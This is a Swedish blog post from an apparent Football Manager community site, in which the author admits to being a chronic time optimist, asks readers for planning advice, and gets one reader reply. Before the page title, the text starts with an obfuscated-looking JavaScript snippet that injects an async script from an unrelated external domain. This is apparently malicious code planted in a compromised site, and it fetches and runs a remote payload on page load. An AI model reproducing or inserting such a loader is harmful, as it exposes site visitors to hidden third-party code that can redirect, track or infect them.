;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tidsoptimist – FMSweden
Meny Stäng

Tidsoptimist

Förra veckans AW, som egentligen inte var nån vidare AW, utan mer ett konstaterande att jag skulle försöka bli klar med FMAllsvenskan som jag drog igång i våras. Det har ju givetvis inte hunnits med bland ass.tränarjobb i Tvååker, höstlov och förberedelser till nästa tränarkursmodul. Ni som känner mig vet varför, men för er andra kan jag komma ut ur skuggorna och erkänna: JAG ÄR EN OBOTLIG TIDSOPTIMIST

 

Att hinna göra saker eller att planera saker är det värsta/sämsta jag vet. Jag är så sjukt ostrukturerad att det blir pinsamt ibland. De enklaste sakerna kan ta sjukt lång tid att få gjort. Det är ingen bra egenskap och oavsett hur mycket jag har försökt genom åren, så får jag inte ordning på det.

Dvs när det gäller saker som inte har med fotbollen att göra. Där är jag nästan manisk, det får inte bli sen ankomst, det får inte vara oförberett, det må inte alltid verka som det är så planerat, men det har nog mer med orutin som tränare att göra än något annat.

Jag har en fru som alltid gjort allt grovgörat hemma och nånstans tror jag att det har varit för enkelt för mig att bara flyta med. Jag har liksom alltid fått stöttningen med sådana saker hemifrån. Fotbollen har fått ta all tid och fokus.

Nu är det ju dock lite annorlunda och jag har försökt bättra mig på den delen, men när det gäller saker som ska göras är jag ibland helt hopplös. Så skulle det vara så att ni drabbas av det, så ha med er att det överhuvudtaget inte är nåt jag gör med flit.

Har ni några bra idéer på hur man kan få bukt med planering och dylikt så kom gärna med dom. Och så vill jag fråga er läsare/medlemmar, om ni själva har nåt som ni i det privata livet eller på jobb, har svårt med/jobbat med genom åren, som era vänner hade kunnat säga: Fan, det där är så typiskt dig.

Med det vill jag hälsa trevlig helg, ta hand om er vänner och stanna hemma om ni kan.

SKÅL

Tobbe

Please wait...

Liknande Inlägg

1 kommentar

  1. Daniel Nilsson

    Intressant läsning i vanlig ordning!

    Jag brottas med problemet att lyckas hitta rutiner i livet vilket till viss del är förståeligt eftersom både jag och min fru jobbar skift. Nu har jag börjat på ett nytt jobb vilket innebär måndag – fredag men innan dess så kändes det som ett sjukt svårt pussel att lösa. Det är en bit kvar på pusslet men det vissa bitar börjar falla på sin plats.

Lämna ett svar